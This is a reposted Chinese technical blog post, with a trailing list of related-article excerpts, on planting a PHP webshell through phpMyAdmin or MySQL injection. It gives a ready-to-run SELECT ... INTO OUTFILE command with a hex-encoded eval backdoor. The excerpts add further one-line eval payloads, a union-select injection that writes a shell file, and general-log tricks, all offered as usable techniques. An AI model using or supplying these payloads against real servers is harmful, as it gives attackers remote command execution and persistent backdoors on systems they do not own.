phpmyadmin\select into outfile导出webshell技巧

最新推荐文章于 2025-02-20 00:30:00 发布
转载 最新推荐文章于 2025-02-20 00:30:00 发布 · 261 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/mujj/articles/1989896.html
文章标签:

#php #数据库

本文介绍了一种通过SQL注入漏洞导出文件并获取WebShell的方法。具体步骤包括执行特定SQL命令将一句话木马写入服务器文件,适用于PHP+MySQL环境且无需预先创建表。

在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出,经过我实验 其实不用建表 就可以导出文件的
比如我们进入了phpmyadmin,随便点击一个数据库,然后点击sql,接着执行

select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'd:/xamp/www/ok.php'

即可将一句话<?php eval($_REQUEST[cmd]);?>导出得到webshell.

遇到php+mysql注入点的时候 如果权限允许并且php.ini里面magic_quotes_gpc=off时候也可以在相应地方直接写入一句话到 web目录,jsp+mysql的话就不需要考虑magic_quotes_gpc... 

转载于:https://www.cnblogs.com/mujj/articles/1989896.html

phpmyadmin上传Webshell总结
afei001
08-31 617
目录 1.select查询输出webshell (1)创建表并INTO OUTFILE写入一句话 (2)select ... INTO OUTFILE写入一句话 2.通过构造命令执行拿shell (1)构造命令执行 (2)命令执行使用system()函数报错解决 3.secure_file_priv值不为空解决办法 4.通过数据库日志写入webshell (1)通过查询日志写入webshell (2)通过慢查询日志写入webshell 5.菜刀连接Windows和Linux系统区别
Webshell上传方式
悦分享
07-31 4277
某天公司的网络运维人员发现公司的业务系统遭到了攻击,被挂了木马,导致公司数据泄露,并且黑客留下了后门。Webshell,顾名思义web指的是在web服务器上,而shell是用脚本语言编写的脚本程序Webshell就是就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,可以对web服务器进行操作的权限,也可以将其称做为一种网页后门。............
select into outfile导出webshell技巧
收集盒 Book box
01-14 6903
select into outfile导出webshell技巧   在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出,经过我实验 其实不用建表 就可以导出文件的   比如我们进入了phpmyadmin,随便点击一个数据库,然后点击sql,接着执行select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3
安装phpMyAdmin,使用into outfile给靶场写入一句话木马
DMXA的博客
10-12 619
通过phpinfo页面中Document_Root参数获取网站绝对路径。通过构建sql写入一句话木马。
[01] SQL注入漏洞解析:如何利用LOAD_FILE()和SELECT INTO OUTFILE读取与写入服务器文件[webshell] 超详细文章
热门推荐
浩策盾悟
02-20 1万+
SQL注入漏洞的两种常见利用方式:SQL读取文件漏洞和SQL写入文件漏洞。攻击者可通过特定的SQL函数(如LOAD_FILE())读取服务器文件,甚至通过注入恶意SQL语句写入Web Shell,进而控制目标系统。文章详细说明了漏洞利用的条件、检测方法及防护建议
Web渗透测试之SQL注入:Level7--outfile导出数据并获得webshell
vodkaDL的博客
11-13 521
文章目录前言导出数据上传webshell总结 前言 导出数据 上传webshell 总结
phpmyadmin登录后台后利用日志或file_into写入webshell
不想当脚本小子的脚本小子
01-15 661
必须为root权限并且已知网站路径: 在后台管理界面中,将general log改为ON ,general log file另存为网站目录下(webshell必须写入到网站目录下) 再利用sql语句写入用菜刀连接即可
phpmyadmin上传Webshell总结.docx
08-31
SELECT <field> FROM <table> INTO OUTFILE '<file_path>'; DROP TABLE IF EXISTS ; ``` 或者直接使用`SELECT ... INTO OUTFILE`语句: ```sql select '($_POST[pwd]);?>' into outfile '<file_path>'; ```...
SELECT '恶意代码' INTO OUTFILE '/usr/bin/backdoor'
最新发布
07-31
首先,用户的问题是关于SQL注入漏洞的利用,具体是使用`SELECT '恶意代码' INTO OUTFILE '/usr/bin/backdoor'`。这似乎是针对将恶意代码写入服务器文件系统的安全漏洞。 参考提供的引用: - 引用[1]:提到了通过...
phpmyadmin渗透拿webshell
qq_45793883的博客
01-31 945
首先我们用诸如下图的谷歌语法比如:inurl:index.php intitle:phpMyAdmin 以及shoudan,钟馗之眼等可以再网上搜到一大批暴露的phpmyadmin,看到个文章讲的比较详细https://blog.youkuaiyun.com/weixin_44023460/article/details/84925950 我们可以尝试弱口令爆破 ,爆破工具:http://ximcx.cn/p...
Mysql注入中的outfile、dumpfile、load_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下 翻译一下就是 其中当参数 secure_file_priv 为空时,对导入导出无限制 当值为一个指定的目录时,只能向指定的目录导入导出 当值被设置为NULL时,禁止导
SQL注入写webshell
xiaoka__的博客
11-21 2573
今天来说一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECTINTO OUTFILE 这个语句,下面是一个语句的例子:       SELECT * INTO OUTFILE ‘C:\log1.txt’ 例如: ?id=1’ union select 1,2,’<?php @eval($_REQUEST[cmd]);?>’ into outfile ‘C:\phpStudy\WWW\502g58de\hahaha.php’ --+ 然后菜刀连接就完了 搞不明白...
PhPmyadmin提权之FILE权限修改
weixin_67803112的博客
11-05 724
每一次渗透都是在开盲盒,永远不知道下一个难点在哪里……需要我们一次次尝试,一次次失败,一次次总结,才会把我们所谓的难点变成基操…..
通过phpmyadmin拿下webshell
weixin_30561177的博客
11-14 129
废话: 1.听说网上卖手机的网站很多是诈骗的,搜到一个499元货到付款的手机网站。有点像诈骗,但倒觉得他是在收集用户信息 2.把网站扔到御剑,搜到phpmyadmin的后台,试试下账号密码居然都是默认的(root root) 省得爆破了 步骤: 1. 2. 3. 转载于:https://www.cnblogs.com/zuoxiaolongzzz/p/78354...
phpmyadmin后台获取webshell方法汇总整理
weixin_33754913的博客
02-27 252
方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('&lt;?php @eval($_POST[xiaoma])?&gt;'); SELECT xiaomaFROM study INTO OUTFILE 'E:/...
WEB安全--SQL注入--INTO OUTFILE写入webshell
m0_74800552的博客
02-15 515
在SQL注入中mysql自带的into oufile函数的危害与利用
【Web安全】拿到phpMyAdmin如何获取权限
过期的秋刀鱼
11-29 775
general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,通过弱口令拿到进到phpMyAdmin页面如何才能获取权限。尝试执行outfile语句写入一句话木马。查看general_log是否开启。
phpMyAdmin 常见漏洞利用记录
The current road is different, love needs to distinguish between right and wrong
11-26 2865
目录 简介 phpmyadmin版本信息获取 phpmyadmin密码爆破 phpmyadmin文件写入 phpmyadmin日志写shell phpmyadmin版本漏洞 phpmyadmin 2.x版本反序列化漏洞任意文件读取(wooyun-2016-199433) CVE-2016-5734 RCE命令执行 CVE-2018-12613 文件包含 结语 简介 phpMyAdmin 是一个以PHP为基础,以WebBase方式架构在网站主机上的MySQL的数据库...
phpmyadmin常见getshell的方法
Blue的博客
06-10 2716
1、利用条件2、如果满足以上条件可以直接写shell在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用。在高版本的mysql中默认为NULL,就是不让导入和导出解决办法:在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_
phpMyAdmin中mysql数据的导入与导出教程
"这篇教程介绍了如何使用phpMyAdmin来导入和导出MySQL数据库的数据。" 在进行网站开发和数据库管理时,有效地导入和导出数据是至关重要的任务。phpMyAdmin是一个流行的、基于Web的MySQL数据库管理系统,它允许用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值